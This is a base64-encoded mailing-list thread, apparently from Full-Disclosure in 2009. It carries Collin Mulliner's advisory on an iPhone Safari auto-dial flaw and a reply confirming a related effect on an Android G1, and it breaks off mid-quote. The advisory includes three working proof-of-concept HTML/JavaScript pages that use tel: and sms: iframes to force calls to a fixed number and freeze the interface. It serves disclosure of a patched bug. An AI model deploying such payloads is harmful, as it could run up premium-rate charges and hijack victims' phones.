cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
